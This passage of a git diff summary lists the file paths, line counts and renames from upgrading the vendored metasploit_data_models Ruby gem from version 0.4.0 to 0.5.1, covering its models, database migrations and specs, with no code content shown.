.../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 0 .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 .../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 .../app/models/mdm/web_vuln.rb | 144 ++++ .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../db/migrate/000_create_tables.rb | 79 +++ .../db/migrate/001_add_wmap_tables.rb | 35 + .../db/migrate/002_add_workspaces.rb | 36 + .../db/migrate/003_move_notes.rb | 20 + .../db/migrate/004_add_events_table.rb | 16 + .../db/migrate/005_expand_info.rb | 58 ++ .../db/migrate/006_add_timestamps.rb | 26 + .../db/migrate/007_add_loots.rb | 20 + .../db/migrate/008_create_users.rb | 16 + .../db/migrate/009_add_loots_ctype.rb | 10 + .../db/migrate/010_add_alert_fields.rb | 16 + .../db/migrate/011_add_reports.rb | 19 + .../db/migrate/012_add_tasks.rb | 24 + .../db/migrate/013_add_tasks_result.rb | 10 + .../db/migrate/014_add_loots_fields.rb | 12 + .../db/migrate/015_rename_user.rb | 16 + .../db/migrate/016_add_host_purpose.rb | 10 + .../db/migrate/017_expand_info2.rb | 58 ++ .../db/migrate/018_add_workspace_user_info.rb | 29 + .../db/migrate/019_add_workspace_desc.rb | 23 + .../db/migrate/020_add_user_preferences.rb | 11 + .../migrate/021_standardize_info_and_data.rb | 18 + .../db/migrate/022_enlarge_event_info.rb | 10 + .../migrate/023_add_report_downloaded_at.rb | 10 + .../024_convert_service_info_to_text.rb | 12 + .../db/migrate/025_add_user_admin.rb | 19 + .../db/migrate/026_add_creds_table.rb | 19 + .../20100819123300_migrate_cred_data.rb | 154 +++++ .../20100824151500_add_exploited_table.rb | 16 + .../20100908001428_add_owner_to_workspaces.rb | 9 + .../20100911122000_add_report_templates.rb | 18 + .../20100916151530_require_admin_flag.rb | 15 + ...00916175000_add_campaigns_and_templates.rb | 61 ++ .../20100920012100_add_generate_exe_column.rb | 8 + .../20100926214000_add_template_prefs.rb | 11 + .../migrate/20101001000000_add_web_tables.rb | 57 ++ .../db/migrate/20101002000000_add_query.rb | 10 + .../migrate/20101007000000_add_vuln_info.rb | 15 + ...20101008111800_add_clients_to_campaigns.rb | 10 + ...20101009023300_add_campaign_attachments.rb | 15 + .../20101104135100_add_imported_creds.rb | 17 + .../migrate/20101203000000_fix_web_tables.rb | 34 + .../20101203000001_expand_host_comment.rb | 12 + ...2033_add_limit_to_network_to_workspaces.rb | 9 + ...20110112154300_add_module_uuid_to_tasks.rb | 9 + .../migrate/20110204112800_add_host_tags.rb | 28 + .../20110317144932_add_session_table.rb | 110 +++ ...414180600_add_local_id_to_session_table.rb | 11 + .../20110415175705_add_routes_table.rb | 18 + .../migrate/20110422000000_convert_binary.rb | 72 ++ ...0110425095900_add_last_seen_to_sessions.rb | 8 + ...0110513143900_track_successful_exploits.rb | 31 + ...517160800_rename_and_prune_nessus_vulns.rb | 26 + ...0527000000_add_task_id_to_reports_table.rb | 11 + .../20110527000001_add_api_keys_table.rb | 12 + .../20110606000001_add_macros_table.rb | 16 + ...10622000000_add_settings_to_tasks_table.rb | 12 + .../20110624000001_add_listeners_table.rb | 19 + ...0625000001_add_macro_to_listeners_table.rb | 12 + ...110630000001_add_nexpose_consoles_table.rb | 21 + ...0002_add_name_to_nexpose_consoles_table.rb | 12 + .../20110717000001_add_profiles_table.rb | 15 + ...20110727163801_expand_cred_ptype_column.rb | 9 + .../20110730000001_add_initial_indexes.rb | 85 +++ .../migrate/20110812000001_prune_indexes.rb | 23 + .../db/migrate/20110922000000_expand_notes.rb | 9 + .../20110928101300_add_mod_ref_table.rb | 17 + ...10000_add_display_name_to_reports_table.rb | 24 + .../db/migrate/20111203000000_inet_columns.rb | 13 + .../20111204000000_more_inet_columns.rb | 17 + .../20111210000000_add_scope_to_hosts.rb | 9 + ...0120126110000_add_virtual_host_to_hosts.rb | 9 + ...20120411173220_rename_workspace_members.rb | 9 + ...20601152442_add_counter_caches_to_hosts.rb | 21 + .../20120625000000_add_vuln_details.rb | 34 + .../20120625000001_add_host_details.rb | 16 + .../migrate/20120625000002_expand_details.rb | 16 + .../migrate/20120625000003_expand_details2.rb | 24 + .../20120625000004_add_vuln_attempts.rb | 19 + ...000005_add_vuln_and_host_counter_caches.rb | 14 + .../20120625000006_add_module_details.rb | 118 ++++ .../20120625000007_add_exploit_attempts.rb | 26 + .../20120625000008_add_fail_message.rb | 12 + ...2805_add_owner_and_payload_to_web_vulns.rb | 13 + ...ired_columns_to_null_false_in_web_vulns.rb | 35 + .../lib/mdm.rb | 0 .../host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../base64_serializer.rb | 0 .../lib/metasploit_data_models/engine.rb | 0 .../serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 8 + .../lib/tasks/yard.rake | 27 + .../metasploit_data_models.gemspec | 4 + .../script/rails | 0 .../spec/app/models/mdm/web_vuln_spec.rb | 87 +++ .../spec/dummy/Rakefile | 0 .../app/assets/javascripts/application.js | 0 .../app/assets/stylesheets/application.css | 0 .../app/controllers/application_controller.rb | 0 .../dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../dummy/config/environments/development.rb | 0 .../dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../initializers/backtrace_silencers.rb | 0 .../dummy/config/initializers/inflections.rb | 0 .../dummy/config/initializers/mime_types.rb | 0 .../dummy/config/initializers/secret_token.rb | 0 .../config/initializers/session_store.rb | 0 .../config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 .../spec/dummy/db/schema.rb | 638 ++++++++++++++++++ .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 2 + ...c => metasploit_data_models-0.5.1.gemspec} | 16 +- 192 files changed, 3131 insertions(+), 47 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.gitignore (78%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/.rspec (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/README.md (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/web_site.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/app/models/mdm/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/console_db.yml (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/base64_serializer.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/engine.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/metasploit_data_models.gemspec (88%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/script/rails (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/helpers/application_helper.rb (100%) 